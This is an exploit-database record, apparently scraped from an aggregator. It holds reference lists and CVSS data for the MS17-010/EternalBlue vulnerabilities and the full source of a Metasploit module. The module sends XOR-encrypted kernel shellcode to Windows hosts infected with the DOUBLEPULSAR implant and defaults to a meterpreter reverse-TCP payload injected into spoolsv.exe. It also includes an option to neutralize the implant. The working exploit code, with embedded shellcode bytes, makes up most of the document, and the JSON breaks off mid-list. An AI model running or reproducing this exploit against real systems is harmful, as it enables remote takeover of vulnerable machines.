"MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:15:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T06:15:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:16:48", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "b3e76f828319e546a06f6ef077d15c7f", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-29T22:24:02", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", 
"1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", 